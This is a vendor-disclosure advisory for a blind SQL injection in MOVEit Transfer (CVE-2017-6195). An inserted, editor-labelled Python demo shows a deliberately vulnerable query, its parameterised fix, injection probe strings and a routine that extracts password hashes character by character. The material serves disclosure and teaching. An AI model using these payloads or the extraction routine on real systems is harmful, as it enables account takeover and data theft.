siberas security advisory SSA-1705
=======================================================================
              title: SQL-Injection
            product: MOVEit Transfer aka MOVEit DMZ
           homepage: https://www.ipswitch.com/secure-information-and-file-transfer/moveit-transfer
vulnerable versions: MOVEit Transfer 2017 <9.0.201, MOVEit DMZ <8.3.0.30, <8.2.0.20, <8.2.X
                CVE: CVE-2017-6195
             impact: critical
           found by: Andreas Schmidt

Advisory History
-----------------------------------------------------------------------
05/20/17 - Version 1.0 - Initial write-up

Product/Vendor Description
-----------------------------------------------------------------------
Source: https://www.ipswitch.com/secure-information-and-file-transfer/moveit-transfer

"Our Managed File Transfer software provides controlled movement of critical data between partners, people and systems to assure data security and regulatory compliance."

"Thousands of IT teams depend on MOVEit Transfer, formerly MOVEit File Transfer (DMZ), to secure files at rest and in transit and assure compliance with SLAs, governance and regulatory mandates."

Impact
-----------------------------------------------------------------------
An attacker can exploit this vulnerability to compromise accounts and thus download nearly every exchanged file without prior authentication. Even if client-certificate authentication has been enabled, the vulnerable function can still be reached. In special installation scenarios it might even be possible to execute code or to fully compromise the system.

Vulnerability Description
-----------------------------------------------------------------------
A (blind) SQL injection vulnerability has been identified in moveitisapi.dll of the MOVEit Transfer product by Ipswitch. The overall impact of this vulnerability depends on the type and configuration of the backend database: MOVEit Transfer ships with a MySQL database, but it can also be configured to use an MSSQL database.
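The Impact section above states that this blind injection is enough to compromise accounts without any prior authentication. The following self-contained example, added here by the editor and not taken from MOVEit, Ipswitch or siberas, shows why a boolean-blind injection confined to a single SELECT already suffices for that: a deliberately vulnerable lookup that concatenates user input into a SELECT, its hardened parameterised counterpart, a two-probe check for the one-bit oracle, and a character-by-character extraction of a password hash through that oracle. Everything in it is constructed: the users table, its columns, the dummy hashes, and the class and function names are assumptions, and sqlite3 stands in for the MySQL backend (sqlite's unicode(substr(...)) plays the role of MySQL's ASCII(SUBSTRING(...))). It does not reproduce the request to moveitisapi.dll.

```python
"""Constructed illustration (added example, not MOVEit or siberas code):
why a boolean-blind SQL injection confined to a single SELECT, with no
stacked queries and a read-only DB user, is still enough to steal
credentials. sqlite3 stands in for the MySQL backend; the schema, user
names, hash values and all names below are invented for this example."""
import sqlite3
from typing import Callable

# Constructed seed data. The hashes are dummy 32-character hex strings.
_SEED_SQL = """
CREATE TABLE users (username TEXT PRIMARY KEY, password_hash TEXT);
INSERT INTO users VALUES ('admin', '5f4dcc3b5aa765d61d8327deb882cf99');
INSERT INTO users VALUES ('alice', 'e99a18c428cb38d5f260853678922e03');
"""


def _connect() -> sqlite3.Connection:
    db = sqlite3.connect(":memory:")
    db.executescript(_SEED_SQL)
    return db


class VulnerableLookup:
    """Deliberately vulnerable (hypothetical) handler: the username is
    concatenated into the SELECT. The caller only learns whether a row
    matched, which is exactly the one-bit oracle a blind injection needs."""

    def __init__(self) -> None:
        self.db = _connect()
        self.queries = 0  # how many requests the attacker had to send

    def user_exists(self, username: str) -> bool:
        self.queries += 1
        sql = "SELECT 1 FROM users WHERE username = '" + username + "'"
        return self.db.execute(sql).fetchone() is not None


class SafeLookup:
    """Hardened form: a bound parameter, so the input can never alter the
    query's structure. Same interface, same one-bit answer."""

    def __init__(self) -> None:
        self.db = _connect()
        self.queries = 0

    def user_exists(self, username: str) -> bool:
        self.queries += 1
        sql = "SELECT 1 FROM users WHERE username = ?"
        return self.db.execute(sql, (username,)).fetchone() is not None


def looks_injectable(oracle: Callable[[str], bool], known_user: str) -> bool:
    """Classic true/false pair: a tautology must keep the row, a
    contradiction must drop it. A parameterised query fails both probes
    because neither string is a real username."""
    return oracle(f"{known_user}' AND '1'='1") and not oracle(f"{known_user}' AND '1'='2")


def extract_hash(oracle: Callable[[str], bool], victim: str, length: int = 32) -> str:
    """Recover victim's password_hash via oracle(username) -> bool, one
    character at a time by binary search over its code point (0..127).
    Every probe is a plain boolean predicate inside the existing SELECT:
    no stacked statement, no INSERT/UPDATE and no file access is needed."""
    recovered = ""
    for pos in range(1, length + 1):
        lo, hi = 0, 127
        while lo < hi:  # invariant: lo <= code point <= hi
            mid = (lo + hi) // 2
            payload = (
                f"{victim}' AND unicode(substr(password_hash,{pos},1)) > {mid} "
                f"AND '1'='1"
            )
            if oracle(payload):
                lo = mid + 1
            else:
                hi = mid
        recovered += chr(lo)
    return recovered


if __name__ == "__main__":
    vuln = VulnerableLookup()
    print("injectable:", looks_injectable(vuln.user_exists, "admin"))
    print("leaked hash:", extract_hash(vuln.user_exists, "admin"),
          "in", vuln.queries, "requests")
    safe = SafeLookup()
    print("hardened injectable:", looks_injectable(safe.user_exists, "admin"))
```

Each character costs seven yes/no requests (a binary search over 128 code points), so a 32-character hash leaks in 224 requests against the vulnerable handler, while the parameterised handler answers every probe with "no user" and leaks nothing. This is the mechanism behind the advisory's point that a read-only, non-stacked injection point is still a critical finding.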
By default MOVEit Transfer uses the MySQL database. The rights of the default DB user 'moveitdmz' are also very limited; for example, it cannot touch the filesystem with 'SELECT ... INTO OUTFILE'. Exploitation is further constrained because query stacking is not possible and the injection point lies inside a SELECT statement, so the attacker cannot modify tables, e.g. cannot chain a SELECT with an INSERT. Despite all these limitations the vulnerability is still critical: a blind injection inside a SELECT is enough to read data such as account information (see the Impact section above).

Further details on how to exploit this vulnerability will be published later on our blog https://www.siberas.de/blog - stay tuned!

Proof Of Concept
-----------------------------------------------------------------------
We provide a test module in our web application toolbox aka watobo: http://watobo.sourceforge.net

Reporting Timeline
-----------------------------------------------------------------------
2016-12-19: Sent information about the vulnerability to the vendor
2016-12-22: Vendor confirmed the PoC
2017-01-03: Fixed version provided to siberas by the vendor - without a license key :/
2017-01-05: Got license key from the vendor
2017-01-09: siberas verified the fixed version
2017-03-??: Customers got a private alert from the vendor
2017-05-18: CVE-2017-6195 published

Solution
-----------------------------------------------------------------------
Update your servers as soon as possible: MOVEit Transfer 2017 9.0.201, MOVEit DMZ 8.3.0.30 or 8.2.0.20, or later, contain the fix (see the "vulnerable versions" line above). Check out the references here: http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-6195

Advisory URL
-----------------------------------------------------------------------
https://www.siberas.de/en/advisories.html

=======================================================================
siberas GmbH
Germany
Offices: Stuttgart, Ulm

siberas GmbH is a team of IT professionals specialized in security assessments and penetration tests which provides competent and vendor-independent consulting services. Our aim is to unveil security vulnerabilities in IT systems and applications and to recommend appropriate measures in order to sustainably improve your general level of security.

-----------------------------------------------------------------------
WE ARE HIRING
-----------------------------------------------------------------------
Interested in working with the experts of siberas? Send us your application to jobs@siberas.de
PGP/FP: C764 934C C8D3 1AC4 FA50 AD8D 7A48 1A88 54E9 2AA8
More information at https://www.siberas.de/jobs.html
-----------------------------------------------------------------------